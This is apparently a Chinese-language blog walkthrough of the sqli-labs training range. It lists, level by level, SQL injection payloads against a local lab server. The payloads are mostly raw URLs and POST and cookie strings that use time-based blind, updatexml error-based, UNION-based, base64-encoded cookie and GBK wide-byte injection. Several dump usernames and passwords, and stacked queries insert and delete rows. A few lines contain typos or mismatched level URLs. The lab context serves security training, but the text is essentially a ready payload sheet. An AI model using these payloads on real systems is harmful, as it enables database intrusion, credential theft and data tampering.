文章目录
- 前言
- 闯关代码
前言
本文介绍的是打SQL靶场相应关卡的代码,基本是基于之前我发的相关文章内容的延伸。要想看代码具体详细的原因,可以参考SQL-libs漏洞思路总结。相信读者看了之后会感觉眼前一亮,也希望读者能得到相应的启发。
闯关过程
SQL第十关
http://192.168.182.30/sql/Less-10/?id=1" and sleep(5)%23通过判断,可以得到包裹符是双引号
http://192.168.182.30/sql/Less-10/?id=1" and if(length(database())=8,sleep(5),1)%23判断出数据库的字符长度为8个
http://192.168.182.30/sql/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1)%23判断出数据库的全称的字符首字母为s
http://192.168.182.30/sql/Less-10/?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(5),1)%23判断出数据库的第一个表名为emails。其中集束炸弹有两个字典,第一个字典为0-9,第二个字典为a-z和0-9。
http://192.168.182.30/sql/Less-10/?id=1" and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1)='i',sleep(5),1)%23判断出emails表中的第一个字段为id
http://192.168.182.30/sql/Less-10/?id=1" and if(substr((select username from users limit 0,1),1,1)='D',sleep(5),1)%23判断出users表中username的所有字段名称
SQL第十一关
包裹符是’
uname=admin&passwd=1' or updatexml(1,concat(0x7e,(select darabase()),0x7e),0)#&submit=Submit判断出数据库是security
uname=admin&passwd=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit判断出表的名字有emails、students、uagents、users、referers
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database()and table_name='users'),0x7e),0)#&submit=Submit判断出字段名有username、password、id
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(username) from (select username from users)a),0x7e),0)#&submit=Submit判断出users表中username中的用户名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(password) from (select password from users)a),0x7e),0)#&submit=Submit判断出users表中password中的密码
SQL第十二关
十二关是post请求
包裹符是”)
uname=admin&passwd=1") or updatexml(1,concat(0x7e,database(),0x7e),0)#&submit=Submit判断出数据库的名为security
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit判断出表的名字有emails、students、uagents、users、referers
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database()and table_name='users'),0x7e),0)#&submit=Submit判断出字段名有username、password、id
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(username)from (select username from users)a),0x7e),0)#&submit=Submit判断出users表中username中的用户名
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(password)from (select password from users)a),0x7e),0)#&submit=Submit判断出users表中password中的密码
SQL第十三关
十三关是post请求
包裹符是’)
uname=admin&passwd=1') or updatexml(1,concat(0x7e,database(),0x7e),0)#&submit=Submit判断出数据库的名为security
uname=admin&passwd=1') or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit判断出表的名字有emails、students、uagents、users、referers
uname=admin&passwd=1') or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0)#&submit=Submit判断出字段名有username、password、id
SQL第二十关
第二十关基于我们已经知道一组用户名和密码,在进行登录后对其进行抓包。
Cookie: uname=Dumb' order by 3%23
Cookie: uname=Dumb' order by 4%23
Cookie: uname=' union select 1,database(),version()%23
Cookie: uname=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
Cookie: uname=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()%23
Cookie: uname=' union select 1,2,group_concat(username,0x3a,password) from users%23
SQL第二十一关
http://192.168.182.30/sql/Less-9/?id=1"%23
http://192.168.182.30/sql/Less-9/?id=1' and sleep(5)%23
http://192.168.182.30/sql/Less-9/?id=1' and if(length(database())=8,sleep(5),1)%23
http://192.168.182.30/sql/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(5),1)%23
http://192.168.182.30/sql/Less-9/?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),1)%23 集束炸弹爆破出第一个表的长度为6位
http://192.168.182.30/sql/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='p',sleep(5),1)%23集束炸弹爆破出第一个表的名字为emails
http://192.168.182.30/sql/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='a',sleep(5),1)%23集束炸弹爆破出emails表中的第一个字段的名字为id
SQL第二十二关
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkj爆破出数据库名
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgdmVyc2lvbigpKSwweDdlKSwxKSM=爆破出数据库的版本号
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSksMHg3ZSksMCkj爆破出表名
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDApIw==爆破出users表中的所有字段名
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIChzZWxlY3QgdXNlcm5hbWUgZnJvbSB1c2VycylhKSwweDdlKSwwKSM=爆破出users表中username字段的值
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHBhc3N3b3JkKSBmcm9tIChzZWxlY3QgcGFzc3dvcmQgZnJvbSB1c2VycylhKSwweDdlKSwwKSM=爆破出users表中password字段的值
SQL 第三十二关
本关试用于中文数据库GBK编码
http://192.168.182.30/sql/Less-32/?id=%df%5c
http://192.168.182.30/sql/Less-32/?id=1%df%27 and 1=1%23
http://192.168.182.30/sql/Less-32/?id=1%df%27 and 1=2%23判断出是数值型漏洞
http://192.168.182.30/sql/Less-32/?id=1%df%27 order by 3%23
http://192.168.182.30/sql/Less-32/?id=1%df%27 order by 2%23
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,database(),version()%23
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479%23
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(username,0x3a,password) from users%23
SQL第三十八关
http://192.168.182.30/sql/Less-38/?id=1'
http://192.168.182.30/sql/Less-38/?id=1' and 1=1--+
http://192.168.182.30/sql/Less-38/?id=1' and 1=2--+
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,database(),version()--+爆出数据库的名和版本号
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+爆出所有表的名字
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+爆出所有表的字段名
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users--+爆出security库中的表users下面的所有用户名和密码的字段
http://192.168.182.30/sql/Less-38/?id=1' ;insert into users(id,username,password) values ('38','Less-38','hello')--+在原有的表users中添加新的字段
http://192.168.182.30/sql/Less-38/?id=1' ;delete from users where id = '38' and username = 'Less-38' and password = 'hello'--+在原有的表users中删除新建的字段